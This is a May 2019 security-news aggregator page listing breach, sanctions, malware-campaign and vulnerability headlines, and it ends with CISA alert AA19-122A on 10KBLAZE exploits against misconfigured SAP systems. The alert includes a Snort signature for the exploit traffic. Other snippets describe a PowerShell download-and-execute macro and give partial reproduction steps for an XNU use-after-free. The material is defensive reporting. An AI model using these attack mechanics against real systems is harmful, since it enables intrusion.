
Latest news about information security threats and incidents


Prevention of security threats and incidents described below is wiser and cheaper than forensic investigations and mitigation of the consequences of a cyber attack.

You can get evidence of this fact from the news below.

Use our services to find and mitigate your security vulnerabilities before the security threat agents find them.




US Government Issues Alert Warning against China Made Drones

Because Chinese-made drones pose a "cyber-espionage" threat to the American organizations and businesses that use them, the US government has issued an alert cautioning against them. The warning does not name a particular organization or company, but rather the notice included that.... (more)

Posted on 23 May 2019 1:02 am


3 Things You Need to Know About Summer Cybersecurity

The summer season is quickly approaching. Users will take to the skies, roads, and oceans to travel throughout the world for a fun family adventure. But just because users take time off doesn’t mean that their security should. So, with the season’s arrival, we decided to conduct a survey so to.... (more)

Posted on 23 May 2019 12:10 am


Getting ready for digital transformation: The biggest cybersecurity challenges - Help Net Security

Getting ready for digital transformation: The biggest cybersecurity challenges. Digital transformation (DX) is becoming the largest driver of new technology investments and projects among businesses and IDC forecasts that global spending on DX will reach $1.18 trillion in 2019. (more)

Posted on 22 May 2019 10:01 pm


ZTE opens cybersecurity laboratory in Italy - RCR Wireless News

Chinese vendor ZTE Corporation has officially launched its cybersecurity laboratory in Rome, Italy. The vendor said that the establishment of the cybersecurity laboratory in Italy is an important measure for ZTE to promote transparency and enhance mutual trust with all third parties. (more)

Posted on 22 May 2019 10:01 pm


New standard Cyber Security Clause agreed by BIMCO's Documentary Committee - PortNews IAA

New standard Cyber Security Clause agreed by BIMCO’s Documentary Committee. BIMCO say its Documentary Committee has agreed a new standard Cyber Security Clause that requires the parties to implement cyber security procedures and systems, to help reduce the risk of an incident and mitigate the consequences should a security breach occur. (more)

Posted on 22 May 2019 10:01 pm


Proactive Malware Intelligence & Increasing ROI of SIEM & SOAR Deployments

With today's challenges from an increasingly hostile threat landscape, combined with a lack of people, expertise, and budget, organizations are driving toward optimizing their SIEM and SOAR solutions in order to get the highest return on their investment. (more)

Posted on 22 May 2019 9:32 pm


Google Stored Unhashed G Suite Passwords for Years

Google is notifying G Suite enterprise users and administrators this week that the company had inadvertently stored passwords in an unhashed, but still encrypted, state for several years because of a flaw in the platform's administration console. (more)

Posted on 22 May 2019 8:21 pm


Siemens, Alphabet’s Chronicle forge cybersecurity partnership

Siemens, Alphabet’s Chronicle forge cybersecurity partnership. Chronicle’s Backstory platform will be combined with Siemens’ cybersecurity tools for the energy industry. (more)

Posted on 22 May 2019 8:03 pm


Packet Storm Security Advisories: Ubuntu Security Notice USN-3992-1

Ubuntu Security Notice 3992-1 - A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting.... (more)

Posted on 22 May 2019 7:13 pm


The Cybersecurity Industry’s Third-Party Risk Management Problem Is Rooted in Visibility

Third-party risk management is an issue that keeps many chief information security officers (CISOs) and other security leaders awake at night. Third-party risk has a lot more in common with phishing than advanced persistent threats (APTs) or zero-day attacks; it’s a known issue, but there’s a huge.... (more)

Posted on 22 May 2019 5:35 pm


Did The U.S. Navy Launch A Cyber Attack On The U.S. Air Force?

Military Times: The Air Force is investigating the Navy for a cyber intrusion into its network, according to a memo obtained by Military Times. The bizarre turn of events stems from a decision by a Navy prosecutor to embed hidden tracking.... (more)

Posted on 22 May 2019 4:40 pm


How to Download Tor for Android, an Internet Browser That Won’t Spy on You

The Tor Project has announced the first stable release of its ultra-secure internet browser for Android devices—and you can download it for free right now. The software comes with a slew of privacy protections that are not typically available in rival browsers such as Google Chrome, Safari or Microsoft Edge, developers said. (more)

Posted on 22 May 2019 4:27 pm


Truecaller users' data available for sale: Rs 1.5lakh for Indian users' info

Another day, another data breach. This time your favourite calls identity app – Truecaller – is facing data breaching allegation. Data of Truecaller users, which includes names, phone numbers and email addresses of users worldwide, is available for sale on the dark web, according to a cybersecurity analyst. (more)

Posted on 22 May 2019 4:10 pm


Cyber Command's latest VirusTotal upload has been linked to an active attack

The malware sample that U.S. Cyber Command uploaded to VirusTotal last week is still involved in active attacks, multiple security researchers tell CyberScoop. Researchers from Kaspersky Lab and ZoneAlarm, a software security company run by Check Point Technologies, tell CyberScoop they have linked.... (more)

Posted on 22 May 2019 3:57 pm


Cache of 49 million Instagram records found online

A security researcher has discovered a massive cache of data for millions of Instagram accounts, publicly accessible for everyone to see. The records included sensitive information that would be useful to cyberstalkers, among others. A security researcher calling themselves Anurag Sen on Twitter.... (more)

Posted on 22 May 2019 3:31 pm


Computer Infected with 6 High-Profile Viruses Surpasses $1M in Auction

A Windows laptop infected with six high-profile computer viruses has surpassed a value of one million dollars in public auction bids. For a project called “The Persistence of Chaos,” contemporary internet artist Guo O. Dong and security firm Deep Instinct infected a Samsung NC10-14GB 10. (more)

Posted on 22 May 2019 2:53 pm


Dark Web Secrets: What Should You Know About Your Information Being on the Dark Web?

Just hearing “dark web” sounds sinister, and it can be. There’s a lot of information passed around on the dark web, and much of it involves criminal activity. A lot of security firms have expanded their offerings to include cybersecurity protection for schools, businesses, and individuals because.... (more)

Posted on 22 May 2019 2:46 pm


Kaspersky warns of major rise in DDoS attacks

Businesses should prepare for a “DDoS storm”, as the number of such attacks has grown rapidly in the past three months. This news comes courtesy of Kaspersky Lab, whose researchers claim there has been an 84 per cent surge in DDoS attacks in the first quarter of 2019, compared to the last quarter of 2018. (more)

Posted on 22 May 2019 2:42 pm


6 keys to MongoDB database security

Don’t be the next MongoDB data breach. Close these holes in your MongoDB deployment before it’s too late. Security is a trending topic again, thanks to recent data leaks involving big corporations. For example, as reported by ZDNet, Chinese companies have leaked an astonishing 590 million resumes. (more)

Posted on 22 May 2019 2:35 pm


Satan Ransomware Expands Portfolio of Exploits

A recently observed Satan ransomware variant has added exploits to its portfolio and is looking to compromise more machines by targeting additional vulnerabilities. First observed in early 2017, the malware has received constant updates to more effectively compromise machines and maximize the attackers’ profits. (more)

Posted on 22 May 2019 2:10 pm


PoC Exploit For Unpatched Windows 10 Zero-Day Flaw Published Online

An anonymous hacker with an online alias “SandboxEscaper” today released proof-of-concept (PoC) exploit code for a new zero-day vulnerability affecting Windows 10 operating system—that’s his/her 5th publicly disclosed Windows zero-day exploit [1, 2, 3] in less than a year. (more)

Posted on 22 May 2019 11:38 am


XNU Stale Pointer Use-After-Free

XNU: Use-after-free due to stale pointer left by in6_pcbdetach. Related CVE Numbers: CVE-2019-8605. Fixed 2019-May-13. # Reproduction: Repros on 10.14.3 when run as root. It may need multiple tries to trigger. $ clang -o in6_selectsrc in6_selectsrc.cc $ while 1; do sudo ./in6_selectsrc; done res0: 3 res1: 0 res1. (more)

Posted on 22 May 2019 11:24 am


Political parties in Europe and the USA are still struggling with cybersecurity basics

Political parties in Europe and the U.S. have cybersecurity practices that fail to meet basic standards, leaving them vulnerable to hackers and foreign influence operations with elections rapidly approaching, according to security researchers. An assessment of 29 political parties in 11 countries.... (more)

Posted on 22 May 2019 10:34 am


Aussie Government IT Worker Arrested for Cryptomining

An Australian government IT contractor has been arrested on suspicion of making thousands from an illegal cryptocurrency mining operation at work. The 33-year-old New South Wales man appeared in court today after allegedly earning AU$9000 ($6188) by “modifying his agency’s computer systems,” according to the Australian Federal Police (AFP). (more)

Posted on 22 May 2019 6:58 am


Attack Combines Phishing, Steganography, PowerShell to Deliver Malware

Researchers have discovered a malware campaign targeting Japan and combining phishing, steganography, PowerShell, and the URLZone and Ursnif malware families. The basic process described in a new report from Cybereason is a malspam campaign with a weaponized Excel document containing a PowerShell script that downloads steganographic images. (more)

Posted on 22 May 2019 6:58 am


How Australia led the US in its global war against Huawei

Mike Burgess, the head of the signals directorate, recently explained why the security of fifth generation, or 5G, technology was so important: It will be integral to the communications at the heart of a country's critical infrastructure - everything from electric power to water supplies to sewage,.... (more)

Posted on 22 May 2019 4:53 am


WhatsApp says it moved fast to contain spyware attack damage

NEW DELHI: WhatsApp told the Indian government that it moved quickly to fix the vulnerability that allowed a spyware attack on users’ phones besides taking action against 4 million accounts to curb abuse of the platform during the general election. “While no safety programme including ours is.... (more)

Posted on 22 May 2019 4:27 am


Cyber-security gap - JTC Associates Ltd

Cyber-security gap. 21st May 2019. There’s a growing cyber-security gap among European businesses – with almost a third (29pc) of surveyed enterprises experiencing a breach last year, while only a little more than half (55pc) believe their digital transformation deployments are very or extremely secure. (more)

Posted on 22 May 2019 3:32 am


Slimstat: Stored XSS from Visitors

The WordPress Slimstat plugin, which currently has over 100k installs, allows your website to gather analytics data for your WordPress website. It will track certain information such as the browser and operating system details, plus page visits to optimize the website analytics. Versions below 4.8. (more)

Posted on 22 May 2019 2:14 am


Spirent incorporates NetSecOPEN test suite into its CyberFlood testing platform

Spirent, the trusted provider of test, measurement, assurance, and analytics solutions for next-generation devices and networks, announced that it has fully incorporated the NetSecOPEN test suite into its CyberFlood testing platform. The new built-in capabilities provide CyberFlood users with the ability.... (more)

Posted on 22 May 2019 2:03 am


USN-3991-1: Firefox vulnerabilities

21 May 2019. Firefox vulnerabilities. A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 19.04; Ubuntu 18.10; Ubuntu 18.04 LTS; Ubuntu 16.04 LTS. Summary: Firefox could be made to crash or run programs as your login if it opened a malicious website. Software description: firefox - Mozilla Open Source web browser. Details. (more)

Posted on 22 May 2019 1:19 am


Hackers Steal Payment Card Data Using Rogue Iframe Phishing

Cybercriminals have upgraded their credit card skimming scripts to use an iframe-based phishing system designed to phish for.... (more)

Posted on 21 May 2019 11:52 pm


Is Healthcare Sector Better Prepared for Ransomware Attacks?

Several recently reported breaches involving ransomware attacks in which organizations recovered without paying a ransom to extortionists offer a glimmer of hope that healthcare entities are getting better prepared to deal with such incidents. (more)

Posted on 21 May 2019 10:55 pm


Irish Cyber Security Cluster officially launched in Cork

CORK, Ireland - Monday marked the official launch of the Irish Cyber Security Cluster, Cyber Ireland. The launch took place at Cork County Hall. The Cyber Security cluster organisation, which is backed by IDA Ireland, brings together industry, academia and government to represent the needs of the.... (more)

Posted on 21 May 2019 10:27 pm


What Is WordPress File Integrity Scanning & Why Your Site Needs It?

Have you ever had to clean your WordPress website from a malware infection? Do you know how to find out which code was compromised? Do you know if your developers or agency left backup and leftover files on your website that can leave you exposed? This post explains how file integrity monitoring (FIM) helps you answer such questions. (more)

Posted on 21 May 2019 10:24 pm


Getting to Know the New RSAC Advisory Board Members: Dawn Cappelli

Name: Dawn Cappelli. Title and company: VP Global Security and CISO, Rockwell Automation. Number of years in the information security industry: 18. RSAC: What was your first job in the infosec industry? I started working at Carnegie Mellon University’s CERT Program one month before 9/11. I was hired to help the US. (more)

Posted on 21 May 2019 10:11 pm


Mozilla Releases Security Updates for Firefox

Original release date: May 21, 2019. Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR. (more)

Posted on 21 May 2019 10:11 pm


Cyber attack on Sunderland City Council database: Investigation after library users' personal data accessed by hackers - Sunderland Echo

Hackers have accessed users' personal details in a cyber attack on Sunderland City Council's library database. Council chiefs are warning users to be vigilant after a number of customers' details were accessed during a cyber incident involving the library services customer database. (more)

Posted on 21 May 2019 8:48 pm


Low CVE-2019-12215: Matomo Matomo

Description: ** DISPUTED ** A full path disclosure vulnerability was discovered in Matomo v3.9.1 where a user can trigger a particular error to discover the full path of Matomo on the disk, because lastError.file is used in plugins/CorePluginsAdmin/templates/safemode.twig. (more)

Posted on 21 May 2019 8:42 pm


“Hackable?” Puts Smartphones to the Test

Is the Personal Data on Your Smartphone Vulnerable? Listen to Find Out: Used for everything from banking and taking pictures, to navigating, streaming, and connecting, mobile devices are a treasure trove of sensitive personal data. On the latest episode of “Hackable?” the team investigates how.... (more)

Posted on 21 May 2019 7:51 pm


MuddyWater APT Group Upgrades Tactics to Avoid Detection

MuddyWater, a relatively new advanced persistent threat group that is targeting organizations in the Middle East, has changed some of its tactics to avoid detection while continuing to plant backdoors within targeted networks, according to new research from.... (more)

Posted on 21 May 2019 6:10 pm


WEBINAR: How to Get Enterprise Cyber Security for your Mid-Sized Organization

A high-quality cybersecurity posture is typically regarded as the exclusive domain of large and heavily resourced enterprises – those who can afford a multi-product security stack and a skilled security team to operate it. This implies a grave risk to all organizations who are not part of this.... (more)

Posted on 21 May 2019 5:53 pm


Crossword Cybersecurity Consulting unit launches new information security product - Proactive Investors UK

“We are delighted to have launched our virtual CISO service with a three-year contract, Crossword's largest value contract to date,” said Stuart Jubb, managing director of the unit. The product aims to be a cheaper alternative to having a Chief Information Security Officer. (more)

Posted on 21 May 2019 5:27 pm


Schumer asks government to probe rail tech from China

By Nandita Bose. WASHINGTON (Reuters) - U.S. Senate Democratic leader Chuck Schumer is asking the federal government to investigate if a plan for new subway cars in New York City, designed by a Chinese state-owned firm, could pose a threat to national security. (more)

Posted on 21 May 2019 5:11 pm


Computrols CBAS Web

Advisory Document (more)

Posted on 21 May 2019 5:05 pm


Value Added Distributor Rain Networks chooses CloudCare for its distribution portfolio

21 May 2019. CloudCare helps its MSP clients gain competitive edge by delivering critical security services from one platform. The Company. Rain Networks isn’t your average IT solutions distributor. Starting operations in 2003, the Seattle-based company initially sold antivirus software solutions to.... (more)

Posted on 21 May 2019 5:03 pm


Mitsubishi Electric MELSEC-Q Series Ethernet Module

Advisory Document (more)

Posted on 21 May 2019 5:00 pm


49 Million Instagram Influencers, Celebrities Personal Data Leaked Online

A newly uncovered massive database containing the contact information of nearly 49 million Instagram influencers, celebrities and brand accounts has leaked online. Security researcher Anurag Sen discovered this unprotected database and reported it to TechCrunch; as a result, the owners were notified and secured the database. (more)

Posted on 21 May 2019 3:54 pm


HawkEye Attack Wave Sends Stolen Data to Another Keylogger Provider

A recent attack wave involving HawkEye malware sends data stolen from its victims to another keylogger provider’s website. On 21 May, My Online Security came across a new sample of HawkEye. The actual delivery mechanism itself wasn’t unique compared to previous attacks involving the malware. (more)

Posted on 21 May 2019 3:30 pm


How to block hijacking attacks on your Google account

Securing your Google account against the vast majority of account hijacking attempts is as simple as adding a recovery phone number, new research by Google, New York University, and the University of California, San Diego shows. The researchers discovered that the mere addition of a recovery phone.... (more)

Posted on 21 May 2019 3:08 pm


Windows Sandbox: How to use Microsoft's simple virtual Windows PC to secure your digital life

Microsoft may be positioning its upcoming, easy-peasy Windows Sandbox within the Windows 10 May 2019 Update as a safe zone for testing untrusted applications, but it’s much more than that. Windows Sandbox, and sandboxing PC apps in general, give you a solution for trying a “utility” that may be malware, or a website that you’re not sure about. (more)

Posted on 21 May 2019 3:05 pm


Industrial Robotics – Are You Increasing Your Cybersecurity Risk?

There’s nothing fundamentally novel about the use of robots in industrial environments. For nearly half a century, they’ve been changing the way that we manufacture products and deal with risk in hazardous environments. From automotive assembly lines to mines, robots have been helping to boost productivity and safety for decades. (more)

Posted on 21 May 2019 1:50 pm


Ransomware and malware attacks decline, attackers adopting covert tactics

There has been a major decline in ransomware and malware attacks, with Ireland having some of the lowest rates globally, according to the latest report released by Microsoft. This is a significant change from 2017, following a prolific series of attacks that targeted supply chains globally. (more)

Posted on 21 May 2019 12:58 pm


Huawei gets 90-day reprieve for Android ban

Huawei has been granted a 90-day reprieve by the US government after Google was ordered to remove its access to services on the Android mobile OS. The bottom line is, nothing is changing right now. Your Huawei P30 Pro or Mate 20 will continue to function as normal, and you’ll be able to download, delete, and update apps as you always have. (more)

Posted on 21 May 2019 12:51 pm


MuddyWater APT’s BlackWater Malware Campaign Installs a Backdoor on Victims’ PCs to Gain Remote Access and Evade Detection

Researchers discovered a “BlackWater” malware campaign, suspected to be associated with the well-known MuddyWater APT, that bypasses security controls and installs a backdoor on victims’ PCs using MuddyWater’s tactics, techniques, and procedures (TTPs). MuddyWater has been involved in various cyber attacks in recent.... (more)

Posted on 21 May 2019 12:50 pm


US fires arrow into Huawei's Achilles heel

The Trump administration's move to block US technology sales to Huawei shoots an arrow deep into the Chinese tech giant's Achilles heel—its over-reliance on American components—and threatens the company's very survival, analysts said. Citing national security, President Donald Trump last week.... (more)

Posted on 21 May 2019 11:59 am


Websites of at least eleven institutions in Sri Lanka hit by cyber attacks

Several .lk and .com websites belonging to different institutions in Sri Lanka were defaced in the cyber attack. However, none of the gov.lk websites are affected by the attack. Cybercriminals have defaced websites of at least 11 institutions in Sri Lanka in a recent cyber attack. (more)

Posted on 21 May 2019 11:10 am


Instagram Influencer’s Account Information Exposed

The life of Instagram Influencers goes public. An exposed database seems to have been added to the information available about them. According to a TechCrunch report, account details of 49 million Instagram users, including influential people and brand accounts, have been published online. (more)

Posted on 21 May 2019 9:20 am


W97M/Downloader Malware Dropper Served from Compromised Websites

W97M/Downloader is part of a large banking malware operation that peaked in March 2016. Bad actors have been distributing this campaign for well over a year, which serves as a doorway to Vawtrak and Dridex banking trojans. This malware campaign targets a wide array of users via their operating system and browser to deliver the appropriate payload. (more)

Posted on 21 May 2019 7:28 am


U.S. eases restrictions on Huawei; founder says U.S. underestimates Chinese firm

The U.S. Commerce Department will allow Huawei Technologies Co Ltd to purchase American-made goods in order to maintain existing networks and provide software updates to existing Huawei handsets. The world’s largest telecommunications equipment maker is still prohibited from buying American parts.... (more)

Posted on 21 May 2019 7:16 am


Exabeam enhances security management approach and boosts cybersecurity degree program

Exabeam, the Smarter SIEM company, announced a partnership with Deakin University in Australia to strengthen its security management approach and bolster its already distinguished cybersecurity degree program, delivered through the School of IT. The university not only deployed Exabeam Advanced.... (more)

Posted on 21 May 2019 7:07 am


US warns of China’s new sinister spies

It says they are being used to deliver ‘spyware’ to networks and redirect sensitive data. An overnight alert from DHS’s Cybersecurity and Infrastructure Security Agency states drones are a “potential risk to an organisation’s information” because they can “contain components that can compromise your.... (more)

Posted on 21 May 2019 6:36 am


New Executive Order To Further Restrict Business with Huawei and Other Foreign Adversaries Engaged in Cyber Espionage

On May 15, 2019, President Trump issued an Executive Order (“EO”) targeting activities of certain foreign telecommunications companies based in hostile countries. Entitled “Securing the Information and Communications Technology and Services Supply Chain,” the EO declares a national emergency based.... (more)

Posted on 21 May 2019 4:03 am


Trickbot Watch: Arrival via Redirection URL in Spam - TrendLabs Security Intelligence Blog

by Miguel Ang (Threats Analyst) We discovered a variant of the Trickbot banking trojan (detected by Trend Micro as TrojanSpy.Win32.TRICKBOT.THDEAI) using a redirection URL in a spam email. In this particular case, the variant used Google to redirect from the URL hxxps://google[. (more)

Posted on 21 May 2019 4:03 am


DHS Reportedly Warns of Chinese-Made Drones Stealing Data

The U.S. Department of Homeland Security is warning that Chinese-made drones could be sending sensitive data back to their manufacturers in China, where it can be accessed by the government, according to news reports from and others. (more)

Posted on 21 May 2019 1:57 am


Staying Cyber Safe During Memorial Day

Original release date: May 20, 2019. As Memorial Day approaches, the Cybersecurity and Infrastructure Security Agency (CISA) reminds users to stay cyber safe. Users should be cautious of potential scams, such as unsolicited emails that contain malicious links or attachments with malware. (more)

Posted on 21 May 2019 12:28 am


Phishing: Mitigating Risk, Minimizing Damage

As phishing attacks continue to menace healthcare and other business sectors, security experts say organizations must take critical steps to prevent falling victim and help limit the potential damage. "Phishing.... (more)

Posted on 20 May 2019 11:53 pm


DHS warns of data threat from Chinese-made drones

WASHINGTON (Reuters) - The U.S. Department of Homeland Security has warned U.S. firms of the risks to company data from Chinese-made drones, according to a notice reviewed by Reuters on Monday. The notice, titled “Chinese Manufactured Unmanned Aircraft Systems,” warned that U.S. (more)

Posted on 20 May 2019 11:33 pm


Huawei can no longer use Android system on its smartphones

Specialists report that Google has decided to suspend its business with the Chinese company, including activities of transfer of hardware, software and technical services except for the open source projects. This decision comes after President Donald Trump’s executive order, which prohibits.... (more)

Posted on 20 May 2019 10:51 pm


Coordinated anti-Trump campaign emerges on Instagram: study

May 21, 2019 00:07:04 IST. By Crispian Balmer. ROME (Reuters) - Accounts tagged 'hatetrump' and 'ihatetrump' are part of a coordinated campaign to undermine U.S. President Donald Trump that has emerged on social media site Instagram, an independent study has revealed. (more)

Posted on 20 May 2019 10:30 pm


GM says most new vehicles to get over-the-air upgrade tech by 2023

DETROIT: General Motors Co said on Monday most of its global models will be capable of over-the-air software upgrades by 2023, as the automaker rolls out new vehicle electrical systems designed to securely handle heavy data traffic and software downloads from the internet. (more)

Posted on 20 May 2019 8:40 pm


Linux Kernel Privilege Escalation Vulnerability Found in RDS Over TCP (SecurityWeek)

A memory corruption vulnerability recently found in Linux Kernel’s implementation of RDS over TCP could lead to privilege escalation. Tracked as CVE-2019-11815 and featuring a CVSS base score of 8.1, the flaw impacts Linux kernels prior to 5.0.8, but only systems that use the Reliable Datagram Sockets (RDS) for the TCP module. (more)

Posted on 20 May 2019 8:21 pm


Defiant Tech firm who operated LeakedSource pleads guilty

The Royal Canadian Mounted Police (RCMP) announced that Defiant Tech Inc., the company behind the LeakedSource.com website, has pleaded guilty in Canada. The LeakedSource website was launched in late 2015, in January 2017 the.... (more)

Posted on 20 May 2019 6:51 pm


ThreatQuotient Expands Integration with MITRE ATT&CK Framework to Offer Full Support for Customers

ThreatQ Adds Support for Mobile and PRE-ATT&CK in Response to Rapid Customer Adoption. LONDON, 20th May 2019. ThreatQuotient, a leading security operations platform innovator, today announced that the ThreatQ integration with MITRE ATT&CK now includes support for PRE-ATT&CK and Mobile. (more)

Posted on 20 May 2019 5:10 pm


TeamViewer was Targeted by Chinese Hackers in 2016

By Ryan De Souza. TeamViewer has only now confirmed that Chinese state-sponsored hackers targeted the company in 2016. The Germany-based company behind the world-famous remote desktop software TeamViewer has confirmed that in 2016 TeamViewer software was compromised. (more)

Posted on 20 May 2019 4:06 pm


ExtraHop for IBM QRadar part of collaborative development to stay ahead of evolving threats - Help Net Security

ExtraHop, provider of enterprise cyber analytics from the inside out, launched the ExtraHop for IBM QRadar app, which integrates with IBM Security Intelligence technology to stream accurate, contextual network behavioral detections into the QRadar SIEM. With Reveal(x) detections in QRadar, organizations.... (more)

Posted on 20 May 2019 3:53 pm


Julian Assange's Belongings Handed to US Prosecutors - WikiLeaks

The material is said to include two of Assange’s manuscripts. Kristinn Hrafnsson, the editor-in-chief of WikiLeaks, said: “On Monday, Ecuador will perform a puppet show at the embassy of Ecuador in London for their masters in Washington, just in time to expand their extradition case before the UK deadline on 14 June. (more)

Posted on 20 May 2019 2:48 pm


Will the U.S. government draft cybersecurity professionals?

Will there be a giant sucking sound of cybersecurity talent evading the draft by moving to Canada? The National Commission on Military, National and Public Service, created by Congress, is currently evaluating the Selective Service System (SSS) with an eye toward modernizing the draft, including the.... (more)

Posted on 20 May 2019 2:47 pm


How to Fight Back Against Macro Malware

In this example, the Shell function is called to execute the variable exec , which is a PowerShell command that downloads and executes payload.txt from a remote URL. Along with executing PowerShell commands, Visual Basic functions can be used to run other shell commands, access the file system and.... (more)

Posted on 20 May 2019 2:31 pm


NSW govt appoints new cyber chief

The NSW government has appointed Tony Chapman to oversee its realigned government-wide cyber security office as the state's new chief cyber security officer. Chapman, who has been acting chief information security officer since the departure of former CISO Maria Milosavljevic, took up the new position today. (more)

Posted on 20 May 2019 10:50 am


Alibaba Cloud, China Telecom, Google Cloud, HUAWEI CLOUD & McAfee – Catch them all in one place at Cloud Expo Asia, Hong Kong

McAfee (booth E09), the device-to-cloud cybersecurity company, will showcase McAfee MVISION Cloud - the leading cloud access security broker (CASB) that protects data where it lives today, with a solution built natively in the cloud, for the cloud. "Cloud Expo Asia is the perfect platform to.... (more)

Posted on 20 May 2019 10:20 am


Phishing targeting SaaS and webmail services increased to 36% of all phishing attacks

Users of Software-as-a-Service (SaaS) and webmail services are being targeted with increasing frequency, according to the APWG Q1 2019 Phishing Activity Trends Report. The category became the biggest target in Q1, accounting for 36 percent of all phishing attacks, for the first time eclipsing the.... (more)

Posted on 20 May 2019 9:18 am


On the path to Zero Trust security: Time to get started

Patrick Sullivan, Senior Director, Security Technology and Strategy, Akamai, May 20, 2019. No need to belabour the point. We all know that trying to defend the network perimeter is a bit futile in today’s mobile and cloud-first world. (more)

Posted on 20 May 2019 9:11 am


Companies investing in advanced forensic capabilities to identify attackers in greater detail

One in five companies are already using forensic investigations and other sophisticated methods to identify their attackers, such as setting up honeypots and repositories of fake data that give attackers the impression they have hit real data while serving as a diversion, according to Neustar. (more)

Posted on 20 May 2019 9:04 am


Bengaluru topped cyber hitlist in 2018, says study

Awareness around cybercrimes was still quite low, which is worrying, said experts. BENGALURU: Bengaluru faced the highest number of cyberattacks in 2018, according to a report by Quick Heal that was shared exclusively with ET, with other cities including Mumbai, Delhi/National Capital Region and Kolkata also falling victim to these attacks. (more)

Posted on 20 May 2019 8:59 am


Security researchers discover Linux version of Winnti malware

Winnti Linux variant used in 2015 in the hack of a Vietnamese gaming company. For the first time, security researchers have uncovered and analyzed a Linux variant of Winnti, one of the favorite hacking tools used by Beijing hackers over the past decade. (more)

Posted on 20 May 2019 8:05 am


Email Addresses and Passwords Leaked For 113,000 Users Of Account Hijacking Forum

"Ogusers.com -- a forum popular among people involved in hijacking online accounts and conducting SIM swapping attacks to seize control over victims' phone numbers -- has itself been hacked," reports security researcher Brian Krebs. "On May 12, the administrator of OGusers explained an outage to.... (more)

Posted on 20 May 2019 6:51 am


Checkmarx deploys CxSAST on Project Hosts’ FPC FedRAMP-authorized PaaS

Checkmarx, the Software Exposure Platform for the enterprise, has deployed CxSAST on Project Hosts’ Federal Private Cloud (FPC) FedRAMP-authorized Platform-as-a-Service (PaaS). This deployment enables federal agencies to grant a FedRAMP Moderate or DOD Impact Level 5 (IL5) Authority to Operate (ATO) for.... (more)

Posted on 20 May 2019 5:44 am


JASK launches a new Heads Up Display for security operations centers

JASK, the provider of the industry’s first cloud-native SIEM platform, unveiled a first-of-its-kind Heads Up Display (HUD) for security operations centers (SOCs) based on cutting-edge scientific design principles and visualization concepts never before used in the cybersecurity industry. (more)

Posted on 20 May 2019 5:44 am


Singapore opens new maritime cybersecurity operations centre

The Maritime and Port Authority of Singapore (MPA) has officially opened a Maritime Cybersecurity Operations Centre (MSOC) on Thursday to boost cyber defence readiness in the face of rising threats from cyber-attacks. The MSOC, housed and operated by ST Engineering at its electronic hub, conducts.... (more)

Posted on 20 May 2019 5:13 am


HSB Farm Cyber Insurance solution to protect farmers from hackers and malware

HSB, part of Munich Re, announced a new HSB Farm Cyber Insurance solution that helps protect farmers and farm technology from hackers, malware and other cyber attacks. “Innovative technologies are being deployed across the farming industry and data and information systems are helping farmers.... (more)

Posted on 20 May 2019 4:02 am


Schneider Electric Modicon Controllers

Advisory Document (more)

Posted on 16 May 2019 5:05 pm


Fuji Electric Alpha7 PC Loader

Advisory Document (more)

Posted on 16 May 2019 5:00 pm


Omron Network Configurator for DeviceNet

Advisory Document (more)

Posted on 14 May 2019 5:40 pm


Siemens SIMATIC WinCC and SIMATIC PCS 7

Advisory Document (more)

Posted on 14 May 2019 5:35 pm


Siemens LOGO! Soft Comfort

Advisory Document (more)

Posted on 14 May 2019 5:30 pm


Siemens LOGO!8 BM

Advisory Document (more)

Posted on 14 May 2019 5:25 pm


Siemens SINAMICS PERFECT HARMONY GH180 Drives NXG I and NXG II

Advisory Document (more)

Posted on 14 May 2019 5:20 pm


Siemens SINAMICS PERFECT HARMONY GH180 Fieldbus Network

Advisory Document (more)

Posted on 14 May 2019 5:15 pm


Siemens SCALANCE W1750D

Advisory Document (more)

Posted on 14 May 2019 5:10 pm


Siemens SIMATIC PCS 7, WinCC, TIA Portal

Advisory Document (more)

Posted on 14 May 2019 5:05 pm


Siemens SIMATIC Panels and WinCC (TIA Portal)

Advisory Document (more)

Posted on 14 May 2019 5:00 pm


AA19-122A: New Exploits for Unsecure SAP Systems

Original release date: May 02, 2019 | Last revised: May 03, 2019

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure configurations of SAP components. [1]

Technical Details

A presentation at the April 2019 Operation for Community Development and Empowerment (OPCDE) cybersecurity conference describes SAP systems with unsecure configurations exposed to the internet. Typically, SAP systems are not intended to be exposed to the internet, as it is an untrusted network. Malicious cyber actors can attack and compromise these unsecure systems with publicly available exploit tools, termed “10KBLAZE.” The presentation details the new exploit tools and reports on systems exposed to the internet.

SAP Gateway ACL

The SAP Gateway allows non-SAP applications to communicate with SAP applications. If SAP Gateway access control lists (ACLs) are not configured properly (e.g., gw/acl_mode = 0), anonymous users can run operating system (OS) commands. [2] According to the OPCDE presentation, about 900 U.S. internet-facing systems were detected in this vulnerable condition.

SAP Router secinfo

The SAP router is a program that helps connect SAP systems with external networks. The default secinfo configuration for an SAP Gateway allows any internal host to run OS commands anonymously. If an attacker can access a misconfigured SAP router, the router can act as an internal host and proxy the attacker’s requests, which may result in remote code execution. According to the OPCDE presentation, 1,181 SAP routers were exposed to the internet. It is unclear if the exposed systems were confirmed to be vulnerable or were simply running the SAP router service.

SAP Message Server

SAP Message Servers act as brokers between Application Servers (AS). By default, Message Servers listen on a port 39XX and have no authentication. If an attacker can access a Message Server, they can redirect and/or execute legitimate man-in-the-middle (MITM) requests, thereby gaining credentials. Those credentials can be used to execute code or operations on AS servers (assuming the attacker can reach them). According to the OPCDE presentation, there are 693 Message Servers exposed to the internet in the United States. The Message Server ACL must be protected by the customer in all releases.

Signature

CISA worked with security researchers from Onapsis Inc. [3] to develop the following Snort signature that can be used to detect the exploits:

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"10KBLAZE SAP Exploit execute attempt"; flow:established,to_server; content:"|06 cb 03|"; offset:4; depth:3; content:"SAPXPG_START_XPG"; nocase; distance:0; fast_pattern; content:"37D581E3889AF16DA00A000C290099D0001"; nocase; distance:0; content:"extprog"; nocase; distance:0; sid:1; rev:1;)

Mitigations

CISA recommends administrators of SAP systems implement the following to mitigate the vulnerabilities included in the OPCDE presentation:

Ensure a secure configuration of their SAP landscape.
Restrict access to SAP Message Server.
Review SAP Notes 1408081 and 821875.
